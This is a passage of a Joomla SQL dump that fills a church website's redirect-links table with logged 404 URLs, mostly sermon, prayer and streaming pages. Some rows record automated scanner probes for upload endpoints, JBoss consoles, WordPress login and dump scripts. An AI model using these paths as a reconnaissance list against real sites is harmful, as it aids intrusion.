(4774, 'http://www.lifeoasisinternationalchurch.org/resources/live-streamin', NULL, '', '', 3, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4775, 'http://www.lifeoasisinternationalchurch.org/resources/live-streami', NULL, '', '', 2, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4776, 'http://www.lifeoasisinternationalchurch.org/resources/live-stre', NULL, '', '', 2, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4777, 'http://www.lifeoasisinternationalchurch.org/resources/live-stream', NULL, '', '', 3, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4778, 'http://www.lifeoasisinternationalchurch.org/resources/live-', NULL, '', '', 3, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4779, 'http://www.lifeoasisinternationalchurch.org/resources/live-s', NULL, '', '', 4, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4780, 'http://www.lifeoasisinternationalchurch.org/resources/live-strea', NULL, '', '', 3, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4781, 'http://www.lifeoasisinternationalchurch.org/resources/live', NULL, '', '', 3, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4782, 'http://www.lifeoasisinternationalchurch.org/resources/liv', NULL, '', '', 4, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4783, 'http://www.lifeoasisinternationalchurch.org/resources/li', NULL, '', '', 3, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4784, 'http://www.lifeoasisinternationalchurch.org/resources/l', NULL, '', '', 1, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4785, 'http://www.lifeoasisinternationalchurch.org/resourc', NULL, '', '', 2, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4786, 'http://www.lifeoasisinternationalchurch.org/resour', NULL, '', '', 2, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4787, 'http://www.lifeoasisinternationalchurch.org/resou', NULL, '', '', 2, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4788, 'http://www.lifeoasisinternationalchurch.org/resources/live-str', NULL, '', '', 2, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4789, 'http://www.lifeoasisinternationalchurch.org/reso', NULL, '', '', 2, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4790, 'http://www.lifeoasisinternationalchurch.org/res', NULL, '', '', 3, 0, '2017-04-08 02:42:16', '0000-00-00 00:00:00', 301),
(4791, 'http://www.lifeoasisinternationalchurch.org/resources/live-st', NULL, '', '', 2, 0, '2017-04-08 02:42:17', '0000-00-00 00:00:00', 301),
(4792, 'http://www.lifeoasisinternationalchurch.org/re', NULL, '', '', 2, 0, '2017-04-08 02:42:17', '0000-00-00 00:00:00', 301),
(4793, 'http://www.lifeoasisinternationalchurch.org/r', NULL, '', '', 2, 0, '2017-04-08 02:42:17', '0000-00-00 00:00:00', 301),
(4794, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/54-slide-04', NULL, '', '', 3, 0, '2017-04-08 09:35:32', '0000-00-00 00:00:00', 301),
(4795, 'http://lifeoasisinternationalchurch.org/programmes.html', NULL, '', '', 1, 0, '2017-04-08 14:54:11', '0000-00-00 00:00:00', 301),
(4796, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/5-menu-options', NULL, '', '', 3, 0, '2017-04-08 16:06:28', '0000-00-00 00:00:00', 301),
(4797, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/11-about-joomla', NULL, '', '', 3, 0, '2017-04-08 16:06:28', '0000-00-00 00:00:00', 301),
(4798, 'http://www.lifeoasisinternationalchurch.org/home/index.php/component/content/article/5-welcome', NULL, '', '', 2, 0, '2017-04-08 16:06:49', '0000-00-00 00:00:00', 301),
(4799, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 8, 0, '2017-04-08 16:47:02', '0000-00-00 00:00:00', 301),
(4800, 'http://lifeoasisinternationalchurch.org/administrator/index.phpwp-login.php', NULL, '', '', 1, 0, '2017-04-08 18:17:48', '0000-00-00 00:00:00', 301),
(4801, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/73069', NULL, '', '', 1, 0, '2017-04-08 18:50:26', '0000-00-00 00:00:00', 301),
(4802, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/98873', NULL, '', '', 1, 0, '2017-04-08 18:53:10', '0000-00-00 00:00:00', 301),
(4803, 'http://lifeoasisinternationalchurch.org/resources/live-streamin', NULL, '', '', 3, 0, '2017-04-08 18:57:32', '0000-00-00 00:00:00', 301),
(4804, 'http://lifeoasisinternationalchurch.org/resources/live-stre', NULL, '', '', 1, 0, '2017-04-08 18:57:32', '0000-00-00 00:00:00', 301),
(4805, 'http://lifeoasisinternationalchurch.org/resources/live-stream', NULL, '', '', 3, 0, '2017-04-08 18:57:32', '0000-00-00 00:00:00', 301),
(4806, 'http://lifeoasisinternationalchurch.org/resources/live-strea', NULL, '', '', 2, 0, '2017-04-08 18:57:32', '0000-00-00 00:00:00', 301),
(4807, 'http://lifeoasisinternationalchurch.org/resources/live-streami', NULL, '', '', 1, 0, '2017-04-08 18:57:32', '0000-00-00 00:00:00', 301),
(4808, 'http://lifeoasisinternationalchurch.org/resources/live-s', NULL, '', '', 1, 0, '2017-04-08 18:57:32', '0000-00-00 00:00:00', 301),
(4809, 'http://lifeoasisinternationalchurch.org/resources/live-', NULL, '', '', 1, 0, '2017-04-08 18:57:32', '0000-00-00 00:00:00', 301),
(4810, 'http://lifeoasisinternationalchurch.org/resources/live', NULL, '', '', 2, 0, '2017-04-08 18:57:33', '0000-00-00 00:00:00', 301),
(4811, 'http://lifeoasisinternationalchurch.org/resources/live-str', NULL, '', '', 1, 0, '2017-04-08 18:57:33', '0000-00-00 00:00:00', 301),
(4812, 'http://lifeoasisinternationalchurch.org/resources/live-st', NULL, '', '', 2, 0, '2017-04-08 18:57:34', '0000-00-00 00:00:00', 301),
(4813, 'http://lifeoasisinternationalchurch.org/resources/liv', NULL, '', '', 1, 0, '2017-04-08 18:57:34', '0000-00-00 00:00:00', 301),
(4814, 'http://lifeoasisinternationalchurch.org/resources/li', NULL, '', '', 1, 0, '2017-04-08 18:57:34', '0000-00-00 00:00:00', 301),
(4815, 'http://lifeoasisinternationalchurch.org/resources/l', NULL, '', '', 2, 0, '2017-04-08 18:57:34', '0000-00-00 00:00:00', 301),
(4816, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/28847', NULL, '', '', 1, 0, '2017-04-08 19:58:14', '0000-00-00 00:00:00', 301),
(4817, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/11-grace-3', NULL, '', '', 9, 0, '2017-04-08 22:22:07', '0000-00-00 00:00:00', 301),
(4818, 'http://www.lifeoasisinternationalchurch.org/index.php/heart', NULL, '', '', 4, 0, '2017-04-09 03:23:41', '0000-00-00 00:00:00', 301),
(4819, 'http://lifeoasisinternationalchurch.org/gobc/hotel', NULL, '', '', 1, 0, '2017-04-09 10:16:51', '0000-00-00 00:00:00', 301),
(4820, 'http://www.lifeoasisinternationalchurch.org/cron.php?action=test', NULL, 'http://www.lifeoasisinternationalchurch.org/cron.php?action=test', '', 1, 0, '2017-04-09 14:33:14', '0000-00-00 00:00:00', 301),
(4821, 'http://lifeoasisinternationalchurch.org/cron.php?action=test', NULL, 'http://lifeoasisinternationalchurch.org/cron.php?action=test', '', 1, 0, '2017-04-09 19:01:45', '0000-00-00 00:00:00', 301),
(4822, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/10-preset-styles', NULL, '', '', 10, 0, '2017-04-09 22:00:57', '0000-00-00 00:00:00', 301),
(4823, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=33&Itemid=200', NULL, '', '', 2, 0, '2017-04-09 22:25:34', '0000-00-00 00:00:00', 301),
(4824, 'http://www.lifeoasisinternationalchurch.org/templates/jtemplate/index.html', NULL, 'http://www.lifeoasisinternationalchurch.org/templates/jtemplate/index.html', '', 2, 0, '2017-04-10 06:13:59', '0000-00-00 00:00:00', 301),
(4825, 'http://lifeoasisinternationalchurch.org/prayer-request/11-ministries', NULL, '', '', 3, 0, '2017-04-10 06:42:46', '0000-00-00 00:00:00', 301),
(4826, 'http://lifeoasisinternationalchurch.org/loic-forum/14-contact-us', NULL, '', '', 3, 0, '2017-04-10 07:00:31', '0000-00-00 00:00:00', 301),
(4827, 'http://lifeoasisinternationalchurch.org/cache/js-8f2640a34abdc51c58fdb5bb6df16153.php', NULL, '', '', 1, 0, '2017-04-10 07:00:38', '0000-00-00 00:00:00', 301),
(4828, 'http://lifeoasisinternationalchurch.org/testimonies/week.listevents/2012/08/5/15', NULL, '', '', 2, 0, '2017-04-10 07:53:31', '0000-00-00 00:00:00', 301),
(4829, 'http://lifeoasisinternationalchurch.org/template-info/musci', NULL, '', '', 1, 0, '2017-04-10 10:20:35', '0000-00-00 00:00:00', 301),
(4830, 'http://lifeoasisinternationalchurch.org/templates/jtemplate/index.html', NULL, 'http://lifeoasisinternationalchurch.org/templates/jtemplate/index.html', '', 2, 0, '2017-04-10 10:22:27', '0000-00-00 00:00:00', 301),
(4831, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/16-sample-content-5', NULL, '', '', 3, 0, '2017-04-10 11:29:51', '0000-00-00 00:00:00', 301),
(4832, 'http://lifeoasisinternationalchurch.org/prayer-request/2-uncategorised', NULL, '', '', 11, 0, '2017-04-10 11:51:50', '0000-00-00 00:00:00', 301),
(4833, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 29, 0, '2017-04-10 15:01:01', '0000-00-00 00:00:00', 301),
(4834, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/06/15', NULL, '', '', 2, 0, '2017-04-10 16:00:01', '0000-00-00 00:00:00', 301),
(4835, 'https://lifeoasisinternationalchurch.org/18-loic/44-programme', NULL, '', '', 29, 0, '2017-04-10 19:21:04', '0000-00-00 00:00:00', 301),
(4836, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/PregnantWomen', NULL, 'http://google.com', '', 1, 0, '2017-04-10 19:41:22', '0000-00-00 00:00:00', 301),
(4837, 'https://142.4.21.132/admin/config.php', NULL, '', '', 5, 0, '2017-04-10 23:13:09', '0000-00-00 00:00:00', 301),
(4838, 'http://www.lifeoasisinternationalchurch.org/2012-11-09-09-57-10/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-04-11 00:39:52', '0000-00-00 00:00:00', 301),
(4839, 'http://www.lifeoasisinternationalchurch.org/accordion-b/level-2', NULL, '', '', 3, 0, '2017-04-11 01:32:25', '0000-00-00 00:00:00', 301),
(4840, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/11-about-joomla', NULL, '', '', 8, 0, '2017-04-11 01:55:55', '0000-00-00 00:00:00', 301),
(4841, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 32, 0, '2017-04-11 02:00:22', '0000-00-00 00:00:00', 301),
(4842, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/11-grace-3', NULL, '', '', 25, 0, '2017-04-11 02:00:25', '0000-00-00 00:00:00', 301),
(4843, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti/2-uncategorised', NULL, '', '', 2, 0, '2017-04-11 02:00:27', '0000-00-00 00:00:00', 301),
(4844, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/6-integrated-extensions', NULL, '', '', 12, 0, '2017-04-11 02:03:24', '0000-00-00 00:00:00', 301),
(4845, 'https://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 19, 0, '2017-04-11 07:06:59', '0000-00-00 00:00:00', 301),
(4846, 'http://lifeoasisinternationalchurch.org/cmsbuild.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 13:05:31', '0000-00-00 00:00:00', 301),
(4847, 'http://lifeoasisinternationalchurch.org/admin/language/english/total/arhive.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 13:22:39', '0000-00-00 00:00:00', 301),
(4848, 'http://lifeoasisinternationalchurch.org/mod_ariimageslidersa.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 13:24:13', '0000-00-00 00:00:00', 301),
(4849, 'http://lifeoasisinternationalchurch.org/wp-api.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 13:28:58', '0000-00-00 00:00:00', 301),
(4850, 'http://lifeoasisinternationalchurch.org/dump.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 13:31:06', '0000-00-00 00:00:00', 301),
(4851, 'http://lifeoasisinternationalchurch.org/media/version.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 13:44:01', '0000-00-00 00:00:00', 301),
(4852, 'http://lifeoasisinternationalchurch.org/version.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 13:45:39', '0000-00-00 00:00:00', 301),
(4853, 'http://lifeoasisinternationalchurch.org/cgi-bin/cmsbuild.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-11 14:05:12', '0000-00-00 00:00:00', 301),
(4854, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/Holy', NULL, '', '', 1, 0, '2017-04-11 15:03:27', '0000-00-00 00:00:00', 301),
(4855, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/Pregnant', NULL, '', '', 1, 0, '2017-04-11 15:03:32', '0000-00-00 00:00:00', 301),
(4856, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/Holy', NULL, '', '', 1, 0, '2017-04-11 15:03:32', '0000-00-00 00:00:00', 301),
(4857, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/Correct', NULL, '', '', 1, 0, '2017-04-11 15:03:34', '0000-00-00 00:00:00', 301),
(4858, 'http://lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/last', NULL, '', '', 1, 0, '2017-04-11 15:03:35', '0000-00-00 00:00:00', 301),
(4859, 'http://www.lifeoasisinternationalchurch.org/resources/privatestreaming', NULL, '', '', 3, 0, '2017-04-11 15:26:32', '0000-00-00 00:00:00', 301),
(4860, 'http://lifeoasisinternationalchurch.org/-streaming', NULL, '', '', 1, 0, '2017-04-11 16:04:07', '0000-00-00 00:00:00', 301),
(4861, 'http://www.lifeoasisinternationalchurch.org/privatr', NULL, '', '', 1, 0, '2017-04-11 16:05:40', '0000-00-00 00:00:00', 301),
(4862, 'http://lifeoasisinternationalchurch.org/privvate', NULL, '', '', 1, 0, '2017-04-11 16:36:43', '0000-00-00 00:00:00', 301),
(4863, 'http://www.lifeoasisinternationalchurch.org/private stream', NULL, '', '', 1, 0, '2017-04-11 16:46:28', '0000-00-00 00:00:00', 301),
(4864, 'http://www.lifeoasisinternationalchurch.org/blog/itemlist', NULL, '', '', 1, 0, '2017-04-11 19:08:25', '0000-00-00 00:00:00', 301),
(4865, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/11-grace-3', NULL, '', '', 26, 0, '2017-04-11 20:54:24', '0000-00-00 00:00:00', 301),
(4866, 'http://www.lifeoasisinternationalchurch.org/22-joomla/8-you-only-live-once-live-well', NULL, '', '', 4, 0, '2017-04-11 21:03:43', '0000-00-00 00:00:00', 301),
(4867, 'http://lifeoasisinternationalchurch.org/private', NULL, 'http://lifeoasisinternationalchurch.org/private', '', 2, 0, '2017-04-11 21:56:40', '0000-00-00 00:00:00', 301),
(4868, 'http://lifeoasisinternationalchurch.org/resources/zion-pillar/10-about-us', NULL, '', '', 1, 0, '2017-04-12 04:28:41', '0000-00-00 00:00:00', 301),
(4869, 'http://www.lifeoasisinternationalchurch.org//index.php?option=com_myblog&task=ajaxupload', NULL, '', '', 1, 0, '2017-04-12 09:54:57', '0000-00-00 00:00:00', 301),
(4870, 'http://www.lifeoasisinternationalchurch.org/loic//index.php?option=com_myblog&task=ajaxupload', NULL, '', '', 1, 0, '2017-04-12 09:55:00', '0000-00-00 00:00:00', 301),
(4871, 'http://www.lifeoasisinternationalchurch.org/index1.html', NULL, '', '', 1, 0, '2017-04-12 14:35:53', '0000-00-00 00:00:00', 301),
(4872, 'http://lifeoasisinternationalchurch.org/streaming/today', NULL, '', '', 1, 0, '2017-04-12 17:05:13', '0000-00-00 00:00:00', 301),
(4873, 'http://www.lifeoasisinternationalchurch.org/livestr', NULL, '', '', 3, 0, '2017-04-12 18:08:31', '0000-00-00 00:00:00', 301),
(4874, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles', NULL, '', '', 4, 0, '2017-04-12 21:30:21', '0000-00-00 00:00:00', 301),
(4875, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/14/15', NULL, '', '', 2, 0, '2017-04-13 02:37:48', '0000-00-00 00:00:00', 301),
(4876, 'https://lifeoasisinternationalchurch.org/loic/ourbelieve.php', NULL, '', '', 7, 0, '2017-04-13 05:17:22', '0000-00-00 00:00:00', 301),
(4877, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church/18-loic/50-young-achievers', NULL, '', '', 7, 0, '2017-04-13 06:12:39', '0000-00-00 00:00:00', 301),
(4878, 'http://lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker&view=sermons&Itemid=190', NULL, '', '', 1, 0, '2017-04-13 06:30:26', '0000-00-00 00:00:00', 301),
(4879, 'http://www.lifeoasisinternationalchurch.org/index.php/200-2015-day-25', NULL, '', '', 4, 0, '2017-04-13 09:34:50', '0000-00-00 00:00:00', 301),
(4880, 'http://lifeoasisinternationalchurch.org/index.php/partnership1', NULL, '', '', 1, 0, '2017-04-13 16:23:01', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(4881, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 8, 0, '2017-04-13 16:53:42', '0000-00-00 00:00:00', 301),
(4882, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti/11-ministries', NULL, '', '', 1, 0, '2017-04-13 18:41:08', '0000-00-00 00:00:00', 301),
(4883, 'http://lifeoasisinternationalchurch.org/admin-console/', NULL, '', '', 1, 0, '2017-04-13 21:02:11', '0000-00-00 00:00:00', 301),
(4884, 'http://lifeoasisinternationalchurch.org/web-console/Invoker', NULL, '', '', 1, 0, '2017-04-13 21:02:16', '0000-00-00 00:00:00', 301),
(4885, 'http://lifeoasisinternationalchurch.org/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo', NULL, '', '', 1, 0, '2017-04-13 21:02:17', '0000-00-00 00:00:00', 301),
(4886, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/5-menu-options', NULL, '', '', 8, 0, '2017-04-13 23:41:27', '0000-00-00 00:00:00', 301),
(4887, 'http://lifeoasisinternationalchurch.org/sample-levels/level-21', NULL, '', '', 1, 0, '2017-04-14 01:14:47', '0000-00-00 00:00:00', 301),
(4888, 'http://lifeoasisinternationalchurch.org/prayer-request/16-divine-instructions', NULL, '', '', 2, 0, '2017-04-14 08:53:28', '0000-00-00 00:00:00', 301),
(4889, 'http://lifeoasisinternationalchurch.org/resources/live-streaminbbbbbbbbg', NULL, '', '', 1, 0, '2017-04-14 10:18:32', '0000-00-00 00:00:00', 301),
(4890, 'https://www.lifeoasisinternationalchurch.org/eastherfaithseminarlive', NULL, '', '', 1, 0, '2017-04-14 10:27:52', '0000-00-00 00:00:00', 301),
(4891, 'http://lifeoasisinternationalchurch.org/youtub', NULL, '', '', 4, 0, '2017-04-14 12:41:12', '0000-00-00 00:00:00', 301),
(4892, 'https://www.lifeoasisinternationalchurch.org/livestreming', NULL, '', '', 3, 0, '2017-04-14 13:18:32', '0000-00-00 00:00:00', 301),
(4893, 'http://www.lifeoasisinternationalchurch.org/streamingy', NULL, '', '', 1, 0, '2017-04-14 13:34:36', '0000-00-00 00:00:00', 301),
(4894, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 13, 0, '2017-04-14 15:32:36', '0000-00-00 00:00:00', 301),
(4895, 'http://www.lifeoasisinternationalchurch.org/sample-levels/level-2', NULL, '', '', 5, 0, '2017-04-15 03:10:50', '0000-00-00 00:00:00', 301),
(4896, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 2, 0, '2017-04-15 07:03:17', '0000-00-00 00:00:00', 301),
(4897, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 4, 0, '2017-04-15 16:22:31', '0000-00-00 00:00:00', 301),
(4898, 'http://www.lifeoasisinternationalchurch.org/index.php/197-2015-day-22', NULL, '', '', 5, 0, '2017-04-15 18:15:40', '0000-00-00 00:00:00', 301),
(4899, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-15 18:21:52', '0000-00-00 00:00:00', 301),
(4900, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/our-belief/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-15 18:26:08', '0000-00-00 00:00:00', 301),
(4901, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/wimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-15 18:26:08', '0000-00-00 00:00:00', 301),
(4902, 'http://lifeoasisinternationalchurch.org/testimonies/week.listevents/2012/08/12/15', NULL, '', '', 2, 0, '2017-04-15 20:55:20', '0000-00-00 00:00:00', 301),
(4903, 'http://lifeoasisinternationalchurch.org/index.php/tutorials/the-church', NULL, '', '', 1, 0, '2017-04-15 21:37:54', '0000-00-00 00:00:00', 301),
(4904, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/70611', NULL, '', '', 1, 0, '2017-04-15 22:42:12', '0000-00-00 00:00:00', 301),
(4905, 'https://142.4.21.132/login.html', NULL, 'https://142.4.21.132/login.html', '', 3, 0, '2017-04-15 23:25:54', '0000-00-00 00:00:00', 301),
(4906, 'http://www.lifeoasisinternationalchurch.org/index.php/167-day-39', NULL, '', '', 5, 0, '2017-04-16 08:30:35', '0000-00-00 00:00:00', 301),
(4907, 'http://www.lifeoasisinternationalchurch.org/index.php/103-prayerfocus30', NULL, '', '', 4, 0, '2017-04-16 08:38:52', '0000-00-00 00:00:00', 301),
(4908, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=59&Itemid=308', NULL, '', '', 1, 0, '2017-04-17 04:26:46', '0000-00-00 00:00:00', 301),
(4909, 'http://lifeoasisinternationalchurch.org/resources/youtube-live/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-17 04:40:08', '0000-00-00 00:00:00', 301),
(4910, 'http://lifeoasisinternationalchurch.org/programmes.php', NULL, '', '', 1, 0, '2017-04-17 04:46:32', '0000-00-00 00:00:00', 301),
(4911, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=49:mimmp&catid=18:loic&Itemid=238', NULL, '', '', 1, 0, '2017-04-17 04:48:53', '0000-00-00 00:00:00', 301),
(4912, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=48&Itemid=239', NULL, '', '', 1, 0, '2017-04-17 04:48:54', '0000-00-00 00:00:00', 301),
(4913, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 2, 0, '2017-04-17 05:12:46', '0000-00-00 00:00:00', 301),
(4914, 'http://lifeoasisinternationalchurch.org/streamingprivate', NULL, '', '', 1, 0, '2017-04-17 11:32:53', '0000-00-00 00:00:00', 301),
(4915, 'http://www.lifeoasisinternationalchurch.org/sreaming', NULL, '', '', 13, 0, '2017-04-17 11:40:28', '0000-00-00 00:00:00', 301),
(4916, 'http://www.lifeoasisinternationalchurch.org/template-info/gin/18-loic/50-young-achievers?page&print=1&tmpl=component', NULL, '', '', 1, 0, '2017-04-17 19:48:54', '0000-00-00 00:00:00', 301),
(4917, 'https://lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/popup?tmpl=component', NULL, '', '', 15, 0, '2017-04-17 21:15:53', '0000-00-00 00:00:00', 301),
(4918, 'http://www.lifeoasisinternationalchurch.org/partnership/22-joomla/8-you-only-live-once-live-well', NULL, '', '', 4, 0, '2017-04-18 00:37:04', '0000-00-00 00:00:00', 301),
(4919, 'http://www.lifeoasisinternationalchurch.org/partnership/22-joomla/11-music-is-food-for-the-soul', NULL, '', '', 4, 0, '2017-04-18 00:37:05', '0000-00-00 00:00:00', 301),
(4920, 'http://www.lifeoasisinternationalchurch.org/private/streaming', NULL, '', '', 8, 0, '2017-04-18 15:46:33', '0000-00-00 00:00:00', 301),
(4921, 'http://www.lifeoasisinternationalchurch.org/our-gallery', NULL, '', '', 1, 0, '2017-04-18 16:22:18', '0000-00-00 00:00:00', 301),
(4922, 'http://lifeoasisinternationalchurch.org/sample-levels/level-22', NULL, '', '', 1, 0, '2017-04-19 02:03:22', '0000-00-00 00:00:00', 301),
(4923, 'http://lifeoasisinternationalchurch.org/s', NULL, '', '', 1, 0, '2017-04-19 05:20:50', '0000-00-00 00:00:00', 301),
(4924, 'http://lifeoasisinternationalchurch.org/st', NULL, '', '', 2, 0, '2017-04-19 05:20:51', '0000-00-00 00:00:00', 301),
(4925, 'http://lifeoasisinternationalchurch.org/streami', NULL, '', '', 1, 0, '2017-04-19 05:20:52', '0000-00-00 00:00:00', 301),
(4926, 'http://lifeoasisinternationalchurch.org/strea', NULL, '', '', 1, 0, '2017-04-19 05:20:52', '0000-00-00 00:00:00', 301),
(4927, 'http://lifeoasisinternationalchurch.org/str', NULL, '', '', 1, 0, '2017-04-19 05:20:55', '0000-00-00 00:00:00', 301),
(4928, 'http://lifeoasisinternationalchurch.org/stre', NULL, '', '', 1, 0, '2017-04-19 05:21:04', '0000-00-00 00:00:00', 301),
(4929, 'http://lifeoasisinternationalchurch.org/wp-temporary.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-04-19 12:36:46', '0000-00-00 00:00:00', 301),
(4930, 'http://lifeoasisinternationalchurch.org/wp-help.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-04-19 12:37:50', '0000-00-00 00:00:00', 301),
(4931, 'http://www.lifeoasisinternationalchurch.org/https://abundantlifehouse.org/index.php?route=product/category&path=79', NULL, '', '', 1, 0, '2017-04-19 14:06:36', '0000-00-00 00:00:00', 301),
(4932, 'http://www.lifeoasisinternationalchurch.org/spirit-meat', NULL, '', '', 1, 0, '2017-04-19 19:24:26', '0000-00-00 00:00:00', 301),
(4933, 'http://lifeoasisinternationalchurch.org/youtube/private', NULL, '', '', 1, 0, '2017-04-19 22:54:36', '0000-00-00 00:00:00', 301),
(4934, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 17, 0, '2017-04-20 10:24:26', '0000-00-00 00:00:00', 301),
(4935, 'http://lifeoasisinternationalchurch.org/index.php/246-day-10-of-21-days-fasting-and-prayer-october', NULL, '', '', 2, 0, '2017-04-20 19:37:19', '0000-00-00 00:00:00', 301),
(4936, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/19-sample-content-8', NULL, '', '', 1, 0, '2017-04-20 22:27:19', '0000-00-00 00:00:00', 301),
(4937, 'http://www.lifeoasisinternationalchurch.org/index.php/programme', NULL, '', '', 1, 0, '2017-04-20 22:27:44', '0000-00-00 00:00:00', 301),
(4938, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_contentview=articleid=97Itemid=773Check', NULL, '', '', 1, 0, '2017-04-21 05:56:04', '0000-00-00 00:00:00', 301),
(4939, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_contentview=articleid=4Itemid=104', NULL, '', '', 1, 0, '2017-04-21 05:56:26', '0000-00-00 00:00:00', 301),
(4940, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_contentview=articleid=97Itemid=773img', NULL, '', '', 1, 0, '2017-04-21 05:56:29', '0000-00-00 00:00:00', 301),
(4941, 'http://www.lifeoasisinternationalchurch.org/privat-live-streaming', NULL, '', '', 2, 0, '2017-04-21 16:06:55', '0000-00-00 00:00:00', 301),
(4942, 'http://www.lifeoasisinternationalchurch.org/private-live-streaming', NULL, '', '', 9, 0, '2017-04-21 16:07:08', '0000-00-00 00:00:00', 301),
(4943, 'http://www.lifeoasisinternationalchurch.org/prayer/145-2014-16?tmpl=component&print=1&layout=default&page=', NULL, '', '', 1, 0, '2017-04-21 18:25:56', '0000-00-00 00:00:00', 301),
(4944, 'http://www.lifeoasisinternationalchurch.org/prayer/75-day-23', NULL, '', '', 1, 0, '2017-04-21 18:26:44', '0000-00-00 00:00:00', 301),
(4945, 'http://www.lifeoasisinternationalchurch.org/prayer/133-2014-4', NULL, '', '', 1, 0, '2017-04-21 18:26:45', '0000-00-00 00:00:00', 301),
